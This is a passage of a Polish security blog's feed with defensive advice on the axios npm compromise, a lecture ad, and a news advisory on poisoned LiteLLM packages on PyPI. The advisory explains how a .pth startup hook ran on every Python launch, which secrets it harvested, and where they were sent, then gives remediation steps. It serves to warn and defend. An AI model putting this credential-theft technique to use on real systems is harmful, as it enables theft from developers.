<p><strong>Na przyszłość:</strong> Jeśli nie musisz, nie pozwalaj paczkom na samowolkę podczas instalacji. Używaj flagi npm ci <span class="code">&#8211;ignore-scripts</span>. Warto też zauważyć, że oba wydania pozbawione były commitów (brak pola gitHead), oficjalnych tagów w repozytorium GitHub (wywołanie GitHub API o tag v1.14.1 zwracało błąd 404) oraz SLSA provenance attestations, które w wersji poprzedniej (1.14.0 i 0.30.3) były obecne. Warto się zastanowić, czy nie wykrywać tego typu anomalii przy zaciąganiu nowych wersji paczek. Albo czy nie <strong>opóźniać instalacji nowych paczek</strong> o kilka dni &#8212; jak widać po ostatnich atakach, community dość szybko wykrywa ataki, więc zamrożenie wersji zależności może być dobrym ogranicznikiem ryzyka.</p>
<p><code>~/.config/uv/uv.toml<br />
  exclude-newer = "7 days"<br />
  ~/.npmrc<br />
  min-release-age=7 # days<br />
  ignore-scripts=true<br />
  ~/Library/Preferences/pnpm/rc<br />
  minimum-release-age=10080 # minutes<br />
  ~/.bunfig.toml<br />
  [install]<br />
  minimumReleaseAge = 604800 # seconds</code></p>
<p>Jeśli potrzebujecie zadbać o <strong>bezpieczeństwo swoich projektów programistycznych</strong> od A do Z, to zapraszamy na nasze turbo-praktyczne szkolenie &#8220;<a href="https://niebezpiecznik.pl/web" target="_blank">Bezpieczeństwo Webaplikacji</a>&#8220;, w ramach którego podczas <strong>praktycznych 2-dniowych warsztatów</strong> pokazujemy jakich błędów przy tworzeniu oprogramowania uniknąć i jak im zapobiegać. Średnia ocen tego szkolenia to <strong>9,45/10</strong>. Oto najbliższe terminy tego szkolenia:</p>
<div class="info"><div><p><b style="color:#f00"><span style="color:#FF00FF">ZDALNIE</span></b>: <strong>14-15 maja 2026</strong>r. — <b style="color:#f00">UWAGA</b>: zostały <strong> tylko 2 wolne miejsca</strong><br />
                        Ostatnio ktoś zarejestrował się 28 kwietnia 2026r. → <a href="https://niebezpiecznik.pl/szkolenia/rejestracja/?sz=1ifh8i6">zarejestruj się na to szkolenie</a></p>
                        
                        <ul>
                        2444 PLN netto (do 6 maja)<br>
                        2744 PLN netto (od 7 maja)
                        </ul></div><div><p><b style="color:#f00">Kraków</b>: <strong>22-23 czerwca 2026</strong>r. — <b style="color:#f00">UWAGA</b>: zostały <strong> tylko 4 wolne miejsca</strong><br />
                        Ostatnio ktoś zarejestrował się 13 kwietnia 2026r. → <a href="https://niebezpiecznik.pl/szkolenia/rejestracja/?sz=1gqo7fr">zarejestruj się na to szkolenie</a></p>
                        
                        <ul>
                        2444 PLN netto (do 8 maja)<br>
                        2744 PLN netto (od 9 maja)
                        </ul></div><div><p><b style="color:#f00">Warszawa</b>: <strong>02-03 lipca 2026</strong>r. — zostało <strong>8 wolnych miejsc</strong><br />
                        Ostatnio ktoś zarejestrował się 30 kwietnia 2026r. → <a href="https://niebezpiecznik.pl/szkolenia/rejestracja/?sz=1gqobbl">zarejestruj się na to szkolenie</a></p>
                        
                        <ul>
                        2444 PLN netto (do 8 maja)<br>
                        2744 PLN netto (od 9 maja)
                        </ul></div><div><p><b style="color:#f00">Wrocław</b>: <strong>07-08 września 2026</strong>r. — zostało <strong>9 wolnych miejsc</strong><br />
                        Ostatnio ktoś zarejestrował się 30 kwietnia 2026r. → <a href="https://niebezpiecznik.pl/szkolenia/rejestracja/?sz=1idapyj">zarejestruj się na to szkolenie</a></p>
                        
                        <ul>
                        2444 PLN netto (do 15 maja)<br>
                        2744 PLN netto (od 16 maja)
                        </ul></div><div><p><b style="color:#f00">Poznań</b>: <strong>14-15 grudnia 2026</strong>r. — zostało <strong>9 wolnych miejsc</strong><br />
                        Ostatnio ktoś zarejestrował się 30 kwietnia 2026r. → <a href="https://niebezpiecznik.pl/szkolenia/rejestracja/?sz=1idaqel">zarejestruj się na to szkolenie</a></p>
                        
                        <ul>
                        2444 PLN netto (do 29 maja)<br>
                        2744 PLN netto (od 30 maja)
                        </ul></div></div>
<p><em>Podzielcie się tym info z kolegami i koleżankami z zespołów. Kto pierwszy w biurze wpisał w nocy lub nad ranem npm update, ten potrzebuje pomocy. Sprawdźcie też czy jakieś automatyzacje nie budowały/aktualizowały Wam przez noc softu/środowiska w oparciu o axiosa. Wygląda na to, że nocne kodowanie to jednak nie taki zen&#8230; </em></p>
]]></content>
		
					<link href="https://niebezpiecznik.pl/post/powazny-atak-programistow-popularna-biblioteka-axios-byla-zainfekowana/#comments" rel="replies" thr:count="12" type="text/html"/>
			<link href="https://niebezpiecznik.pl/post/powazny-atak-programistow-popularna-biblioteka-axios-byla-zainfekowana/feed/atom/" rel="replies" thr:count="12" type="application/atom+xml"/>
			<thr:total>12</thr:total>
			</entry>
		<entry>
		<author>
			<name>redakcja</name>
					</author>

		<title type="html"><![CDATA[Jak Nie Dać Się Zhackować? Czyli nasz wykład dla każdego znowu w Twoim mieście :)]]></title>
		<link href="https://niebezpiecznik.pl/post/jak-nie-dac-sie-zhackowac-czyli-nasz-wyklad-dla-kazdego-znowu-w-twoim-miescie/" rel="alternate" type="text/html"/>

		<id>https://niebezpiecznik.pl/?p=26972</id>
		<updated>2026-03-30T08:39:33Z</updated>
		<published>2026-03-30T08:39:33Z</published>
		<category scheme="https://niebezpiecznik.pl" term="*GLOWNA"/>
		<summary type="html"><![CDATA[<a href="https://niebezpiecznik.pl/post/jak-nie-dac-sie-zhackowac-czyli-nasz-wyklad-dla-kazdego-znowu-w-twoim-miescie/"><img align="left" hspace="5" width="100" height="100" src="https://niebezpiecznik.pl/wp-content/uploads/2019/03/m181204_NBZP0047-150x150.jpg" class="alignleft tfe wp-post-image" alt="" decoding="async" loading="lazy" /></a>Każdy, kto korzysta z komputera, smartfona i internetu powinien wiedzieć jak robić to bezpiecznie. Od lat, tego jak “nie dać się zhackować” uczymy nie tylko pracowników największych polskich firm na szkoleniach zamkniętych odbywających się w ich siedzibach, ale także każdego kto chce — wystarczy wpaść na nasz 3 godzinny, pełen praktycznych porad i widowiskowych pokazów wykład. Właśnie ruszamy w [&#8230;]]]></summary>

					<content type="html" xml:base="https://niebezpiecznik.pl/post/jak-nie-dac-sie-zhackowac-czyli-nasz-wyklad-dla-kazdego-znowu-w-twoim-miescie/"><![CDATA[<p>Każdy, kto korzysta z komputera, smartfona i internetu powinien wiedzieć jak robić to bezpiecznie. Od lat, tego jak “nie dać się zhackować” uczymy nie tylko pracowników największych polskich firm na <a href="https://niebezpiecznik.pl/post/zapros-niebezpiecznika-do-twojej-firmy-na-goscinny-wyklad-z-cyberbezpieczenstwa/?" target="_blank">szkoleniach zamkniętych odbywających się w ich siedzibach</a>, ale także <strong>każdego kto chce</strong> — wystarczy wpaść na nasz 3 godzinny, pełen praktycznych porad i widowiskowych pokazów <a href="https://niebezpiecznik.pl/wyklad" target="_blank">wykład</a>. Właśnie ruszamy w Polskę z jego 6, ulepszoną edycją &#8212; tym razem odwiedzimy następujące miasta (start o <strong>17:30</strong>):<span id="more-26972"></span></p>
<ul>
		<!-- li><a href="https://nbzp.cz/jnsz-kra2510" target="_blank">KRAKOW <small>(weekend)</small> 4 października -- zapisz się tutaj!</a></li-->
<li><a href="https://nbzp.cz/jnsz-wro2606" target="_blank">WROCŁAW, 11 czerwca -- zapisz się tutaj!</a></li>
<li><a href="https://nbzp.cz/jnsz-kra2609" target="_blank">KRAKÓW, 24 września -- zapisz się tutaj!</a></li>
<li><a href="https://nbzp.cz/jnsz-poz2610" target="_blank">POZNAŃ, 8 października -- zapisz się tutaj!</a></li>
<li><a href="https://nbzp.cz/jnsz-lod2610" target="_blank">ŁÓDŹ, 22 października -- zapisz się tutaj!</a></li>
<li><a href="https://nbzp.cz/jnsz-gda2611" target="_blank">GDAŃSK, 19 listopada -- zapisz się tutaj!</a></li>
<li><a href="https://nbzp.cz/jnsz-waw2612" target="_blank">WARSZAWA, 3 grudnia -- zapisz się tutaj!</a></li>		
</ul>
<div class="info">Jesteś z innego miasta? Nic nie szkodzi, tam pewnie też będziemy! Zostaw nam e-maila w polu poniżej, a powiadomimy Cię o kolejnych terminach: </p>
<form action="https://info.niebezpiecznik.pl/subscribe" method="POST" accept-charset="utf-8" target="_blank" style="margin-top:10px">
<label for="email">E-mail: </label><input type="email" name="email" id="email" size="30" style="margin-bottom:10px"/><br />
<label for="City">Miasto: </label><input type="text" name="City" id="City" style="margin-bottom:10px"/><br />
<input type="submit" name="submit" id="submit" value="Informuj mnie!"/></p>
<div style="display:none"><input type="hidden" name="list" value="my7633jgS8rm9n4vQEyWYBeQ"/> <input type="hidden" name="subform" value="yes"/><label for="hp">HP</label><br /><input type="text" name="hp" id="hp"/></div>
</form>
</div>
<h3>Dlaczego warto przyjść na nasz wykład?</h3>
<p>Poniżej 4 konkretne powody:</p>
<ul>
<strong><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Prosty język.</strong> Wykład bez problemu zrozumieją <strong>osoby nietechniczne</strong> &#8212; prowadzimy go w przystępny dla każdego sposób. Dlatego zapraszamy Was z <strong>rodzicami, dziadkami i znajomymi spoza branży IT</strong>.</p>
<p><strong><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Praktyczne i proste do wdrożenia rady.</strong> Pokażemy Ci jak co zrobić, aby ochronić swoje <strong>pieniądze, dane i prywatność</strong> przed cyberatakami. Nauczymy jak <strong>zabezpieczyć swój komputer i smartfon</strong> &#8212; co włączyć, co wyłączyć, jakie darmowe aplikacje wart doinstalować.</p>
<p><strong><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Demonstracje ataków na żywo</strong>. W trakcie wykładu pokazujemy na publiczności niektóre z ataków. To robi wrażenie i pomaga lepiej zrozumieć jak powinna wyglądać poprawna reakcja.    </p>
<p><strong><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Gwarancja jakości.</strong> Wykład widziało już <strong>kilkaset tysięcy Polaków</strong>. Aktualna średnia ocena to <strong>9,48/10</strong>.</ul>
<p>Jeśli Cię przekonaliśmy, to:</p>
<p><a href="https://bilety.niebezpiecznik.pl"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2018/01/zarejestruj-sie-350x85.png" alt="" width="350" height="85" class="aligncenter size-medium wp-image-16113" srcset="https://niebezpiecznik.pl/wp-content/uploads/2018/01/zarejestruj-sie-350x85.png 350w, https://niebezpiecznik.pl/wp-content/uploads/2018/01/zarejestruj-sie-768x187.png 768w, https://niebezpiecznik.pl/wp-content/uploads/2018/01/zarejestruj-sie-600x146.png 600w, https://niebezpiecznik.pl/wp-content/uploads/2018/01/zarejestruj-sie.png 1084w" sizes="auto, (max-width: 350px) 100vw, 350px" /></a></p>
<p>Poniżej kilka opinii uczestników ostatnich edycji tego wykładu:</p>
<blockquote><p>Fantastyczny wykład. 3 godziny to nie tak mało jak na jedno podejście, a nawet nie wiem kiedy minęły.</p></blockquote>
<blockquote><p>Wykład oceniam wysoko ponieważ, pomimo dosyć dużej wiedzy na ten tamat (interesuje się bezpieczeństwem, czytam niebezpiecznika od dłuższego czasu a od niedawna pracuje w dziale application security) i pomimo tego że się dużo nie dowiedziałem nowego, to naprawdę fajnie spędziłem czas :). Dostałem też, dodatkowej motywacji, aby jeszcze więcej edukować rodzinę i moich znajomych. Dzięki!</p></blockquote>
<blockquote><p>Przydatne były informacje które uświadomiły mi, jak bardzo ważne jest, żeby chronić swoje dane osobowe. Nie zdawałam sobie sprawy jak łatwo można je pozyskać. BARDZO podobał mi się sposób mówienia, lekkość językowa. Łatwa, i zrozumiała nawet dla osoby która nie zna się na tych informatycznych rzeczach :)</p></blockquote>
<blockquote><p>Przed wykładem wydawało mi się, że jestem w zasadzie bezpieczny, że nie tak łatwo kogoś &#8220;zhakować&#8221;. Po wykładzie zrozumiałem, że się myliłem. Jeśli ktoś jest odpowiednio zdeterminowany, posiada wiedzę i cierpliwość, to może to zrobić. Warto mu więc to utrudniać w każdy możliwy sposób.</p></blockquote>
<div id="attachment_19289" style="width: 610px" class="wp-caption aligncenter"><a href="https://niebezpiecznik.pl/wp-content/uploads/2019/03/m181204_NBZP0104.jpg"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-19289" src="https://niebezpiecznik.pl/wp-content/uploads/2019/03/m181204_NBZP0104-600x400.jpg" alt="Uczestnicy poprzedniego wykładu we Wrocławiu" width="600" height="400" class="size-large wp-image-19289" srcset="https://niebezpiecznik.pl/wp-content/uploads/2019/03/m181204_NBZP0104-600x400.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2019/03/m181204_NBZP0104-350x234.jpg 350w, https://niebezpiecznik.pl/wp-content/uploads/2019/03/m181204_NBZP0104-768x513.jpg 768w" sizes="auto, (max-width: 600px) 100vw, 600px" /></a><p id="caption-attachment-19289" class="wp-caption-text">Uczestnicy poprzedniego wykładu we Wrocławiu podczas jednego z eksperymentów :)</p></div>
<p><a href="https://bilety.niebezpiecznik.pl"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2018/01/zarejestruj-sie-350x85.png" alt="" width="350" height="85" class="aligncenter size-medium wp-image-16113" srcset="https://niebezpiecznik.pl/wp-content/uploads/2018/01/zarejestruj-sie-350x85.png 350w, https://niebezpiecznik.pl/wp-content/uploads/2018/01/zarejestruj-sie-768x187.png 768w, https://niebezpiecznik.pl/wp-content/uploads/2018/01/zarejestruj-sie-600x146.png 600w, https://niebezpiecznik.pl/wp-content/uploads/2018/01/zarejestruj-sie.png 1084w" sizes="auto, (max-width: 350px) 100vw, 350px" /></a></p>
<h3>Tematyka wykładu &#8220;Jak nie dać się zhackować?&#8221;</h3>
<p>W ramach trwającego łącznie 3 godziny wykładu (z 15 minutową przerwą w środku) pokażemy Ci:</p>
<ul>
<li>Jak poprawnie <strong>zabezpieczyć komputer i smartfona</strong>, aby nie zostały one zhackowane przez cyberprzestępców</li>
<li>Jak <strong>nie paść ofiarą aktualnych oszustw internetowych, scamów i przekrętów</strong></li>
<p> </p>
<li>Jak najlepiej ochronić swoje pieniądze i jak bezpiecznie robić <strong>zakupy w internecie </strong></li>
<li>Jak <strong>zabezpieczyć swoje dane i komunikację</strong>, aby nie zostały one przez nikogo przechwycone</li>
<li>Jak <strong>chronić swoją prywatność</strong> w trakcie korzystania z e-maila i serwisów społecznościowych</li>
<li>Jak bezpiecznie <strong>korzystać z bankowości internetowej</strong></li>
</ul>
<p>Powyższe zagadnienia zilustrujemy prawdziwymi przykładami ataków, jakie w ostatnich miesiącach dotknęły Polaków, a dodatkowo sami, <strong class="update">na żywo</strong> pokażemy jak atakują cyberprzestępcy.</p>
<ul>
<li>Podszyjemy się pod Pana prezydenta</li>
<li>Wykradniemy dane z telefonu komórkowego</li>
<li>Pokażemy jak szybko łamane są hasła Polaków</li>
<li>Zainfekujemy laptopa ofiary i będziemy ją podglądali przez wbudowaną w laptopa kamerkę</li>
<li>Przejmiemy kontrolę nad komputerem przy pomocy złośliwego pendrive&#8217;a albo ładowarki do papierosa elektronicznego</li>
</ul>
<p>Wierzcie nam, że w trakcie tych pokazów szczęka opadnie Wam nie raz&#8230; Gwarantujemy, że nikt, kto weźmie udział w tym wykładzie, już nigdy nie będzie tym samym człowiekiem  :)</p>
<p><iframe loading="lazy" width="560" height="315" src="https://www.youtube.com/embed/gn-Qit9Qdxg?si=o8WOe7Ul3bLJ2RMM" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></p>
<div class="info">Bilet na wykład możesz także kupić dla kogoś: <strong>Mamy, Taty, Babci, Syna, Znajomego</strong>. To idealny i praktyczny prezent &#8220;na święta&#8221;. Cena biletu to zdecydowanie mniejszy wydatek niż koszt jak musiałbyś ponieść, żeby posprzątać po ewentualnym ataku na bliską Ci osobę. Warto zadbać o swoich bliskich :)</div>
<p><a href="https://bilety.niebezpiecznik.pl"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2018/01/zarejestruj-sie-350x85.png" alt="" width="350" height="85" class="aligncenter size-medium wp-image-16113" srcset="https://niebezpiecznik.pl/wp-content/uploads/2018/01/zarejestruj-sie-350x85.png 350w, https://niebezpiecznik.pl/wp-content/uploads/2018/01/zarejestruj-sie-768x187.png 768w, https://niebezpiecznik.pl/wp-content/uploads/2018/01/zarejestruj-sie-600x146.png 600w, https://niebezpiecznik.pl/wp-content/uploads/2018/01/zarejestruj-sie.png 1084w" sizes="auto, (max-width: 350px) 100vw, 350px" /></a></p>
]]></content>
		
					<link href="https://niebezpiecznik.pl/post/jak-nie-dac-sie-zhackowac-czyli-nasz-wyklad-dla-kazdego-znowu-w-twoim-miescie/#comments" rel="replies" thr:count="3" type="text/html"/>
			<link href="https://niebezpiecznik.pl/post/jak-nie-dac-sie-zhackowac-czyli-nasz-wyklad-dla-kazdego-znowu-w-twoim-miescie/feed/atom/" rel="replies" thr:count="3" type="application/atom+xml"/>
			<thr:total>3</thr:total>
			</entry>
		<entry>
		<author>
			<name>redakcja</name>
					</author>

		<title type="html"><![CDATA[Ktoś zatruł popularną pythonową paczkę z 97 milionami pobrań&#8230;]]></title>
		<link href="https://niebezpiecznik.pl/post/litellm-pypi-python-hack/" rel="alternate" type="text/html"/>

		<id>https://niebezpiecznik.pl/?p=26965</id>
		<updated>2026-03-25T11:16:29Z</updated>
		<published>2026-03-25T11:15:52Z</published>
		<category scheme="https://niebezpiecznik.pl" term="*GLOWNA"/><category scheme="https://niebezpiecznik.pl" term="AI"/><category scheme="https://niebezpiecznik.pl" term="Hacked!"/><category scheme="https://niebezpiecznik.pl" term="LiteLLM"/><category scheme="https://niebezpiecznik.pl" term="programowanie"/><category scheme="https://niebezpiecznik.pl" term="PyPI"/><category scheme="https://niebezpiecznik.pl" term="python"/><category scheme="https://niebezpiecznik.pl" term="supply-chain"/>
		<summary type="html"><![CDATA[<a href="https://niebezpiecznik.pl/post/litellm-pypi-python-hack/"><img align="left" hspace="5" width="100" height="100" src="https://niebezpiecznik.pl/wp-content/uploads/2026/03/liteLLM-hack-150x150.jpg" class="alignleft tfe wp-post-image" alt="" decoding="async" loading="lazy" /></a>Wczoraj, 24 marca, na oficjalnym repozytorium PyPI pojawiła się złośliwa wersja szalenie popularnej biblioteki LiteLLM (wersje 1.82.7 oraz 1.82.8). Czym jest LiteLLM? To opensource&#8217;owa &#8220;bramka&#8221;, która ułatwia programistom łączenie się z wieloma modelami językowymi (LLM) za pomocą jednego interfejsu API. To nie jest niszowy projekt, paczka ma na liczniku ponad 97 milionów pobrań. Wystarczyło zainstalować. [&#8230;]]]></summary>

					<content type="html" xml:base="https://niebezpiecznik.pl/post/litellm-pypi-python-hack/"><![CDATA[<p>Wczoraj, 24 marca, na oficjalnym repozytorium PyPI <a href="https://github.com/BerriAI/litellm/issues/24512" target="_blank">pojawiła się</a> złośliwa wersja szalenie popularnej biblioteki LiteLLM (wersje 1.82.7 oraz 1.82.8). Czym jest LiteLLM? To opensource&#8217;owa &#8220;bramka&#8221;, która ułatwia programistom łączenie się z wieloma modelami językowymi (LLM) za pomocą jednego interfejsu API. To nie jest niszowy projekt, paczka ma na liczniku ponad 97 milionów pobrań.<span id="more-26965"></span></p>
<p><H3>Wystarczyło zainstalować. Nie trzeba było nawet uruchamiać!</H3>Atakujący wykorzystali mechanizm ukrywania kodu w plikach z rozszerzeniem &#8220;<span class="code">.pth</span>&#8221; (tzw. Python Startup Hooks). Wrzucony przez nich do zatrutej paczki plik &#8220;<span class="code">litellm_init.pth</span>&#8221; był <strong>automatycznie wykonywany przy każdym uruchomieniu interpretera Pythona</strong>.</p>
<p>To oznacza, że programiści-ofiary nie musieli wcale pisać &#8220;<span class="code">import litellm</span>&#8221; w swoim kodzie. Wystarczyło, że zainstalowali paczkę (np. poprzez pobranie innego projektu, który używał LiteLLM jako zależności), a ukryty złośliwy skrypt uruchamiał się w tle przy każdym wywołaniu Pythona. Złośliwy kod wykradał z systemu: </p>
<ul>
<li>Klucze SSH, zmienne środowiskowe (a więc i klucze API), i pliki z konfiguracją Dockera.</li>
<li>Dane uwierzytelniające do chmur AWS, GCP, Azure oraz całe konfiguracje klastrów Kubernetes.</li>
<li>Klucze prywatne TLS, hasła do baz danych (PostgreSQL, MySQL, Redis) i pliki portfeli kryptowalutowych.</li>
<li>Historia powłoki (bash_history, zsh_history), gdzie często lądują hasła wpisywane &#8220;z palca&#8221;.</li>
</ul>
<p>Wszystkie te dane są pakowane do archiwum <span class="code">tpcp.tar.gz</span>, szyfrowane i wysyłane na serwer kontrolowany przez napastników: &#8220;<span class="code">models.litellm[.]cloud</span>&#8220;. Wiecie więc już czego szukać w logach&#8230; Szacuje się, że ofiarą tego ataku mogło paść nawet 500 000 urządzeń. Ale mogło być gorzej&#8230;</p>
<p><H3>Wpadka hakera zmniejszyła katastrofę</H3>Co ciekawe, atakujący popełnili głupi błąd. Jak <a href="https://www.google.com/search?q=https://www.bleepingcomputer.com/news/security/popular-litellm-pypi-package-backdoored-to-steal-credentials-auth-tokens/" target="_blank">informuje</a> Callum McMahon, wstrzyknięty kod zachował się u niego jak &#8220;fork bomba&#8221;. Złośliwy skrypt uruchamiał w tle kolejny proces Pythona, co powodowało, że ten nowy proces znowu czytał zatruty plik &#8220;.pth&#8221;, odpalając kolejnego Pythona i tak w nieskończoność. U niektórych programistów używających środowisk takich jak Cursor powodowało to natychmiastowe zużycie pamięci RAM do maksimum i zwieszkę kompa. Dzięki temu, że kod hakerów &#8220;wywalał&#8221; sprzęt, atak szybko zauważono, a <strong>paczkę usunięto z PyPI po niespełna 3 godzinach</strong>. Ale ponoć nie u wszystkich kod się zapętlał&#8230;</p>
<h3>Kto stoi za atakiem i jak tego dokonał?</h3>
<p>A teraz najlepsze. Za atak odpowiada grupa TeamPCP, która dostała się do infrastruktury LiteLLM poprzez wcześniejsze zhackowanie &#8230;<strong>skanera podatności Trivy</strong>, którego używano w procesie CI/CD (automatyzacji budowania i testowania kodu). </p>
<p>To klasyczny, wręcz podręcznikowy <strong>atak na łańcuch dostaw</strong> (ang. supply-chain attack) &#8212; co więcej o tym jak łatwo było wstrzyknąć coś w kod Trivy pisaliśmy w poprzednim artykule &#8212; <a href="https://niebezpiecznik.pl/post/bot-ai-przez-tydzien-hackowal-projekty-na-githubie-i-zhackowal/" target="_blank">zrobił to bot AI, wysyłając im Pull Requesta na GitHubie</a>&#8230;</p>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/03/liteLLM-hacked-1.jpg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/03/liteLLM-hacked-1-350x203.jpg" alt="" width="350" height="203" class="aligncenter size-medium wp-image-26968" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/03/liteLLM-hacked-1-350x203.jpg 350w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/liteLLM-hacked-1-600x348.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/liteLLM-hacked-1-768x446.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/liteLLM-hacked-1-1536x892.jpg 1536w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/liteLLM-hacked-1.jpg 1750w" sizes="auto, (max-width: 350px) 100vw, 350px" /></a></p>
<p><H3>Co robić, jak żyć?</H3>Jeśli używasz Pythona, to:</p>
<blockquote><p>natychmiast sprawdź, czy w Twoim systemie lub kontenerach nie zainstalowała się wersja 1.82.7 lub 1.82.8 pakietu LiteLLM (<span class="code">pip show litellm</span>). Szukaj też pliku &#8220;litellm_init.pth&#8221; w katalogach &#8220;site-packages&#8221; &#8212; a jak go tam znajdziesz, to usuń.</p></blockquote>
<p>Jeśli go znajdziesz &#8212; współczujemy. Musisz założyć, że WSZYSTKIE hasła, klucze API i tokeny, które znajdowały się na tej maszynie (w tym te w plikach .env), są w rękach włamywaczy. Należy je natychmiast ubić/zrotować.</p>
<div class="info">
<a href="https://niebezpiecznik.pl/wp-content/uploads/2020/09/webinary-pic.jpg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2020/09/webinary-pic-208x250.jpg" alt="" width="208" height="250" class="aligncenter size-medium wp-image-22047" srcset="https://niebezpiecznik.pl/wp-content/uploads/2020/09/webinary-pic-208x250.jpg 208w, https://niebezpiecznik.pl/wp-content/uploads/2020/09/webinary-pic-500x600.jpg 500w, https://niebezpiecznik.pl/wp-content/uploads/2020/09/webinary-pic-768x922.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2020/09/webinary-pic.jpg 1122w" sizes="auto, (max-width: 208px) 100vw, 208px" /></a><br />
Chcesz wiedzieć jak bezpiecznie tworzyć kod aplikacji (nie tylko webowych)? To zapraszamy Cię na 2 dniowe, silnie praktyczne, niebezpiecznikowe szkolenie dla programistów &#8220;Atakowanie i Ochrona Webaplikacji&#8221;. Pokazujemy na nim najpopularniejsze błędy, jakie widzimy na testowanych przez nasz zespół bezpieczeństwa aplikacjach i uczymy wszystkiego, na co trzeba zwrócić uwagę podczas projektowania, budowy, testowania i deployowania kodu na produkcję. Najbliższe terminy znajdziesz poniżej (podaj podczas rejestracji w uwagach kod LITELLM, to zapiszemy Cię ze zniżką):</p>
<div><p><b style="color:#f00"><span style="color:#FF00FF">ZDALNIE</span></b>: <strong>14-15 maja 2026</strong>r. — <b style="color:#f00">UWAGA</b>: zostały <strong> tylko 2 wolne miejsca</strong><br />
                        Ostatnio ktoś zarejestrował się 28 kwietnia 2026r. → <a href="https://niebezpiecznik.pl/szkolenia/rejestracja/?sz=1ifh8i6">zarejestruj się na to szkolenie</a></p>
                        
                        <ul>
                        2444 PLN netto (do 6 maja)<br>
                        2744 PLN netto (od 7 maja)
                        </ul></div><div><p><b style="color:#f00">Kraków</b>: <strong>22-23 czerwca 2026</strong>r. — <b style="color:#f00">UWAGA</b>: zostały <strong> tylko 4 wolne miejsca</strong><br />
                        Ostatnio ktoś zarejestrował się 13 kwietnia 2026r. → <a href="https://niebezpiecznik.pl/szkolenia/rejestracja/?sz=1gqo7fr">zarejestruj się na to szkolenie</a></p>
                        
                        <ul>
                        2444 PLN netto (do 8 maja)<br>
                        2744 PLN netto (od 9 maja)
                        </ul></div><div><p><b style="color:#f00">Warszawa</b>: <strong>02-03 lipca 2026</strong>r. — zostało <strong>8 wolnych miejsc</strong><br />
                        Ostatnio ktoś zarejestrował się 30 kwietnia 2026r. → <a href="https://niebezpiecznik.pl/szkolenia/rejestracja/?sz=1gqobbl">zarejestruj się na to szkolenie</a></p>
                        
                        <ul>
                        2444 PLN netto (do 8 maja)<br>
                        2744 PLN netto (od 9 maja)
                        </ul></div><div><p><b style="color:#f00">Wrocław</b>: <strong>07-08 września 2026</strong>r. — zostało <strong>9 wolnych miejsc</strong><br />
                        Ostatnio ktoś zarejestrował się 30 kwietnia 2026r. → <a href="https://niebezpiecznik.pl/szkolenia/rejestracja/?sz=1idapyj">zarejestruj się na to szkolenie</a></p>
                        
                        <ul>
                        2444 PLN netto (do 15 maja)<br>
                        2744 PLN netto (od 16 maja)
                        </ul></div><div><p><b style="color:#f00">Poznań</b>: <strong>14-15 grudnia 2026</strong>r. — zostało <strong>9 wolnych miejsc</strong><br />
                        Ostatnio ktoś zarejestrował się 30 kwietnia 2026r. → <a href="https://niebezpiecznik.pl/szkolenia/rejestracja/?sz=1idaqel">zarejestruj się na to szkolenie</a></p>
                        
                        <ul>
                        2444 PLN netto (do 29 maja)<br>
                        2744 PLN netto (od 30 maja)
                        </ul></div></div>
<p>PS. Badamy zainteresowanie webinarem na temat szeroko rozumianego AI i bezpieczeństwa (zarówno od strony użytkownika jak i developera). Zainteresowany? To zostaw nam maila w polu poniżej &#8212; jak cykl wystartuje, wyślemy Ci powiadomienie:</p>
<blockquote><p>
<script src='https://www.google.com/recaptcha/api.js'></script></p>
<form action="https://info.niebezpiecznik.pl/subscribe" method="POST" accept-charset="utf-8" style="margin-left:auto; margin-right:auto; width: 300px">
<label for="email" style="color:gray">Wpisz adres e-mail:</label><br />
<input type="email" name="email" id="email" size="35"/></p>
<p><label for="email" style="color:gray">Rozwiąż Captcha:</label></p>
<p class="g-recaptcha" data-sitekey="6LeoxuQUAAAAAA5HroywxIlzmrv1K2Ciq0BZKBZb">
<div style="display:none;">
<label for="hp">HP</label><input type="text" name="hp" id="hp"/></div>
<p><input type="hidden" name="list" value="T2Vqs9qFpXQZfhm7VWOOcQ"/><input type="hidden" name="subform" value="yes"/><input type="submit" name="submit" id="submit" value=" Poinformuj mnie o starcie! "/><br />
</form>
<p><small style="color:gray">Bez obaw, podanych e-maili nikomu nie przekazujemy i wykorzystamy je wyłącznie do przypominania Ci o naszych wydarzeniach. Jeśli lubisz czytać o RODO, kliknij <a href="https://niebezpiecznik.pl/regulamin-sklep/#rodo">tutaj</a>.</small>
</p></blockquote>
]]></content>
		
					<link href="https://niebezpiecznik.pl/post/litellm-pypi-python-hack/#comments" rel="replies" thr:count="8" type="text/html"/>
			<link href="https://niebezpiecznik.pl/post/litellm-pypi-python-hack/feed/atom/" rel="replies" thr:count="8" type="application/atom+xml"/>
			<thr:total>8</thr:total>
			</entry>
	</feed>